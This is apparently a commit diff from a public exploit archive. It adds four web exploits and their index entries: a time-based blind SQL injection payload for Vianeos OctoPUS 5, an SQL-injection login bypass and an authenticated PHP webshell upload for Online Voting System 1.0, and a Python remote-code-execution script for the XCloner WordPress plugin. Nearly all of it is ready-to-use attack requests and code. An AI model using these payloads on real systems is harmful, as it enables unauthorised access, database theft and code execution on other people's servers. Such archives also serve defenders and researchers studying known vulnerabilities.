DB: 2021-07-02
4 changes to exploits/shellcodes Online Voting System 1.0 - Authentication Bypass (SQLi) Online Voting System 1.0 - Remote Code Execution (Authenticated) Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated) Vianeos OctoPUS 5 - 'login_user' SQLi
This commit is contained in:
parent
293ca2aadb
commit
4f3cf46cbf
5 changed files with 255 additions and 0 deletions
19
exploits/multiple/webapps/50078.txt
Normal file
19
exploits/multiple/webapps/50078.txt
Normal file
|
@ -0,0 +1,19 @@
|
||||||
|
# Exploit Title: Vianeos OctoPUS 5 - 'login_user' SQLi
|
||||||
|
# Date: 01/07/2021
|
||||||
|
# Exploit Author: Audencia Business SCHOOL
|
||||||
|
# Vendor Homepage: http://www.vianeos.com/en/home-vianeos/
|
||||||
|
# Software Link: http://www.vianeos.com/en/octopus/
|
||||||
|
# Version: > V5
|
||||||
|
# Tested on: Fedora / Apache2 / MariaDB
|
||||||
|
|
||||||
|
|
||||||
|
Octopus V5 SQLi
|
||||||
|
|
||||||
|
The "login_user =" parameter present in the POST authentication request is vulnerable to an Time Based SQLi as follow :
|
||||||
|
|
||||||
|
```
|
||||||
|
Parameter: login_user (POST)
|
||||||
|
Type: time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||||
|
Payload: signin_user=1&login_user=1' AND (SELECT 8860 FROM (SELECT(SLEEP(5)))xENj) AND 'OoKG'='OoKG&password_user=1
|
||||||
|
```
|
35
exploits/php/webapps/50075.txt
Normal file
35
exploits/php/webapps/50075.txt
Normal file
|
@ -0,0 +1,35 @@
|
||||||
|
# Exploit Title: Online Voting System 1.0 - Authentication Bypass (SQLi)
|
||||||
|
# Exploit Author: deathflash1411
|
||||||
|
# Date 30.06.2021
|
||||||
|
# Vendor Homepage: https://www.sourcecodester.com/
|
||||||
|
# Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html
|
||||||
|
# Version 1.0
|
||||||
|
# Tested on: Ubuntu 20.04
|
||||||
|
|
||||||
|
####################
|
||||||
|
# Proof of Concept #
|
||||||
|
####################
|
||||||
|
|
||||||
|
POST /Online_voting_system/admin/ HTTP/1.1
|
||||||
|
Host: localhost
|
||||||
|
Content-Length: 50
|
||||||
|
Cache-Control: max-age=0
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Origin: http://localhost
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||||
|
Referer: http://localhost/Online_voting_system/admin/
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: en-US,en;q=0.9
|
||||||
|
Cookie: PHPSESSID=4ad205f46c868d2bc83e368352d0396a
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
UserName=admin&Password=%27+or+%27%27%3D%27&Login=
|
||||||
|
|
||||||
|
###########
|
||||||
|
# Payload #
|
||||||
|
###########
|
||||||
|
|
||||||
|
UserName=admin
|
||||||
|
Password=' or ''='
|
76
exploits/php/webapps/50076.txt
Normal file
76
exploits/php/webapps/50076.txt
Normal file
|
@ -0,0 +1,76 @@
|
||||||
|
# Exploit Title: Online Voting System 1.0 - Remote Code Execution (Authenticated)
|
||||||
|
# Exploit Author: deathflash1411
|
||||||
|
# Date 30.06.2021
|
||||||
|
# Vendor Homepage: https://www.sourcecodester.com/
|
||||||
|
# Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html
|
||||||
|
# Version 1.0
|
||||||
|
# Tested on: Ubuntu 20.04
|
||||||
|
|
||||||
|
####################
|
||||||
|
# Proof of Concept #
|
||||||
|
####################
|
||||||
|
|
||||||
|
POST /Online_voting_system/admin/save_candidate.php HTTP/1.1
|
||||||
|
Host: localhost
|
||||||
|
Content-Length: 1253
|
||||||
|
Cache-Control: max-age=0
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Origin: http://localhost
|
||||||
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4G9QRpniTS7gPVqW
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||||
|
Referer: http://localhost/Online_voting_system/admin/new_candidate.php
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: en-US,en;q=0.9
|
||||||
|
Cookie: PHPSESSID=4ad205f46c868d2bc83e368352d0396a
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
------WebKitFormBoundary4G9QRpniTS7gPVqW
|
||||||
|
Content-Disposition: form-data; name="user_name"
|
||||||
|
|
||||||
|
admin
|
||||||
|
------WebKitFormBoundary4G9QRpniTS7gPVqW
|
||||||
|
Content-Disposition: form-data; name="rfirstname"
|
||||||
|
|
||||||
|
test
|
||||||
|
------WebKitFormBoundary4G9QRpniTS7gPVqW
|
||||||
|
Content-Disposition: form-data; name="rlastname"
|
||||||
|
|
||||||
|
test
|
||||||
|
------WebKitFormBoundary4G9QRpniTS7gPVqW
|
||||||
|
Content-Disposition: form-data; name="rgender"
|
||||||
|
|
||||||
|
Male
|
||||||
|
------WebKitFormBoundary4G9QRpniTS7gPVqW
|
||||||
|
Content-Disposition: form-data; name="ryear"
|
||||||
|
|
||||||
|
1st year
|
||||||
|
------WebKitFormBoundary4G9QRpniTS7gPVqW
|
||||||
|
Content-Disposition: form-data; name="rmname"
|
||||||
|
|
||||||
|
test
|
||||||
|
------WebKitFormBoundary4G9QRpniTS7gPVqW
|
||||||
|
Content-Disposition: form-data; name="rposition"
|
||||||
|
|
||||||
|
Governor
|
||||||
|
------WebKitFormBoundary4G9QRpniTS7gPVqW
|
||||||
|
Content-Disposition: form-data; name="party"
|
||||||
|
|
||||||
|
test
|
||||||
|
------WebKitFormBoundary4G9QRpniTS7gPVqW
|
||||||
|
Content-Disposition: form-data; name="image"; filename="test.php"
|
||||||
|
Content-Type: application/octet-stream
|
||||||
|
|
||||||
|
<?php echo exec("whoami"); ?>
|
||||||
|
|
||||||
|
------WebKitFormBoundary4G9QRpniTS7gPVqW
|
||||||
|
Content-Disposition: form-data; name="save"
|
||||||
|
|
||||||
|
|
||||||
|
------WebKitFormBoundary4G9QRpniTS7gPVqW--
|
||||||
|
|
||||||
|
########
|
||||||
|
# Note #
|
||||||
|
########
|
||||||
|
|
||||||
|
Uploaded file will be available at http://localhost/Online_voting_system/admin/upload/
|
121
exploits/php/webapps/50077.py
Executable file
121
exploits/php/webapps/50077.py
Executable file
|
@ -0,0 +1,121 @@
|
||||||
|
# Exploit Title: Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)
|
||||||
|
# Date 30.06.2021
|
||||||
|
# Exploit Author: Ron Jost (Hacker5preme)
|
||||||
|
# Vendor Homepage: https://www.xcloner.com/
|
||||||
|
# Software Link: https://downloads.wordpress.org/plugin/xcloner-backup-and-restore.4.2.12.zip
|
||||||
|
# Version: 4.2.1 - 4.2.12
|
||||||
|
# Tested on: Ubuntu 18.04
|
||||||
|
# CVE: CVE-2020-35948
|
||||||
|
# CWE: CWE-732
|
||||||
|
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2020-35948-Exploit/README.md
|
||||||
|
|
||||||
|
'''
|
||||||
|
Description:
|
||||||
|
An issue was discovered in the XCloner Backup and Restore plugin before 4.2.13 for WordPress. It gave authenticated attackers the ability to modify arbitrary files,
|
||||||
|
including PHP files. Doing so would allow an attacker to achieve remote code execution. The xcloner_restore.php write_file_action could overwrite wp-config.php,
|
||||||
|
for example. Alternatively, an attacker could create an exploit chain to obtain a database dump.
|
||||||
|
'''
|
||||||
|
|
||||||
|
|
||||||
|
'''
|
||||||
|
Banner:
|
||||||
|
'''
|
||||||
|
banner = """
|
||||||
|
|
||||||
|
|
||||||
|
##### # # ####### ##### ### ##### ### ##### ####### ##### # #####
|
||||||
|
# # # # # # # # # # # # # # # # # # # # # #
|
||||||
|
# # # # # # # # # # # # # # # # # #
|
||||||
|
# # # ##### ##### ##### # # ##### # # ##### ##### ###### ###### # # #####
|
||||||
|
# # # # # # # # # # # # # ####### # #
|
||||||
|
# # # # # # # # # # # # # # # # # # # #
|
||||||
|
##### # ####### ####### ### ####### ### ##### ##### ##### # #####
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
by @Hacker5preme
|
||||||
|
"""
|
||||||
|
print(banner)
|
||||||
|
|
||||||
|
|
||||||
|
'''
|
||||||
|
Import required modules:
|
||||||
|
'''
|
||||||
|
import requests
|
||||||
|
import argparse
|
||||||
|
|
||||||
|
|
||||||
|
'''
|
||||||
|
User-Input:
|
||||||
|
'''
|
||||||
|
my_parser = argparse.ArgumentParser(description='Wordpress Plugin XCloner RCE (Authenticated)')
|
||||||
|
my_parser.add_argument('-T', '--IP', type=str)
|
||||||
|
my_parser.add_argument('-P', '--PORT', type=str)
|
||||||
|
my_parser.add_argument('-U', '--PATH', type=str)
|
||||||
|
my_parser.add_argument('-u', '--USERNAME', type=str)
|
||||||
|
my_parser.add_argument('-p', '--PASSWORD', type=str)
|
||||||
|
args = my_parser.parse_args()
|
||||||
|
target_ip = args.IP
|
||||||
|
target_port = args.PORT
|
||||||
|
wp_path = args.PATH
|
||||||
|
username = args.USERNAME
|
||||||
|
password = args.PASSWORD
|
||||||
|
print('')
|
||||||
|
ajax_cmd = input('[*] Ajax Command to execute: ')
|
||||||
|
|
||||||
|
'''
|
||||||
|
Authentication:
|
||||||
|
'''
|
||||||
|
session = requests.Session()
|
||||||
|
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
|
||||||
|
|
||||||
|
# Header:
|
||||||
|
header = {
|
||||||
|
'Host': target_ip,
|
||||||
|
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
|
||||||
|
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
|
||||||
|
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
|
||||||
|
'Accept-Encoding': 'gzip, deflate',
|
||||||
|
'Content-Type': 'application/x-www-form-urlencoded',
|
||||||
|
'Origin': 'http://' + target_ip,
|
||||||
|
'Connection': 'close',
|
||||||
|
'Upgrade-Insecure-Requests': '1'
|
||||||
|
}
|
||||||
|
|
||||||
|
# Body:
|
||||||
|
body = {
|
||||||
|
'log': username,
|
||||||
|
'pwd': password,
|
||||||
|
'wp-submit': 'Log In',
|
||||||
|
'testcookie': '1'
|
||||||
|
}
|
||||||
|
|
||||||
|
# Authenticate:
|
||||||
|
print('')
|
||||||
|
auth = session.post(auth_url, headers=header, data=body)
|
||||||
|
auth_header= auth.headers['Set-Cookie']
|
||||||
|
if 'wordpress_logged_in' in auth_header:
|
||||||
|
print('[+] Authentication successfull !')
|
||||||
|
else:
|
||||||
|
print('[-] Authentication failed !')
|
||||||
|
exit()
|
||||||
|
|
||||||
|
|
||||||
|
'''
|
||||||
|
Exploit:
|
||||||
|
'''
|
||||||
|
url_exploit = "http://192.168.0.38:80/wordpress//wp-admin/admin-ajax.php?action=restore_backup"
|
||||||
|
|
||||||
|
header = {
|
||||||
|
"Accept": "*/*",
|
||||||
|
"Content-Type": "multipart/form-data; boundary=------------------------08425016980d7357",
|
||||||
|
"Connection": "close"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Body:
|
||||||
|
body = "--------------------------08425016980d7357\r\nContent-Disposition: form-data; name=\"xcloner_action\"\r\n\r\n%s\r\n--------------------------08425016980d7357--\r\n" % (ajax_cmd)
|
||||||
|
|
||||||
|
exploit = session.post(url_exploit, headers=header, data=body)
|
||||||
|
print('')
|
||||||
|
print(exploit.text)
|
||||||
|
print('')
|
|
@ -44207,9 +44207,13 @@ id,file,description,date,author,type,platform,port
|
||||||
50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",2021-06-25,"Barış Yıldızoğlu",webapps,php,
|
50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",2021-06-25,"Barış Yıldızoğlu",webapps,php,
|
||||||
50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php,
|
50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php,
|
||||||
50066,exploits/php/webapps/50066.txt,"WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)",2021-06-28,"Toby Jackson",webapps,php,
|
50066,exploits/php/webapps/50066.txt,"WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)",2021-06-28,"Toby Jackson",webapps,php,
|
||||||
|
50075,exploits/php/webapps/50075.txt,"Online Voting System 1.0 - Authentication Bypass (SQLi)",2021-07-01,"Salman Asad",webapps,php,
|
||||||
50074,exploits/php/webapps/50074.txt,"Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)",2021-06-30,"Murat DEMİRCİ",webapps,php,
|
50074,exploits/php/webapps/50074.txt,"Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)",2021-06-30,"Murat DEMİRCİ",webapps,php,
|
||||||
50068,exploits/macos/webapps/50068.txt,"Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)",2021-06-28,Captain_hook,webapps,macos,
|
50068,exploits/macos/webapps/50068.txt,"Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)",2021-06-28,Captain_hook,webapps,macos,
|
||||||
50069,exploits/hardware/webapps/50069.py,"Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)",2021-06-28,"Bryan Leong",webapps,hardware,
|
50069,exploits/hardware/webapps/50069.py,"Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)",2021-06-28,"Bryan Leong",webapps,hardware,
|
||||||
50071,exploits/php/webapps/50071.py,"phpAbook 0.9i - SQL Injection",2021-06-30,"Alejandro Perez",webapps,php,
|
50071,exploits/php/webapps/50071.py,"phpAbook 0.9i - SQL Injection",2021-06-30,"Alejandro Perez",webapps,php,
|
||||||
50072,exploits/multiple/webapps/50072.py,"Apache Superset 1.1.0 - Time-Based Account Enumeration",2021-06-30,"Dolev Farhi",webapps,multiple,
|
50072,exploits/multiple/webapps/50072.py,"Apache Superset 1.1.0 - Time-Based Account Enumeration",2021-06-30,"Dolev Farhi",webapps,multiple,
|
||||||
50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,
|
50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,
|
||||||
|
50076,exploits/php/webapps/50076.txt,"Online Voting System 1.0 - Remote Code Execution (Authenticated)",2021-07-01,"Salman Asad",webapps,php,
|
||||||
|
50077,exploits/php/webapps/50077.py,"Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)",2021-07-01,"Ron Jost",webapps,php,
|
||||||
|
50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",2021-07-01,"Audencia Business SCHOOL Red Team",webapps,multiple,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue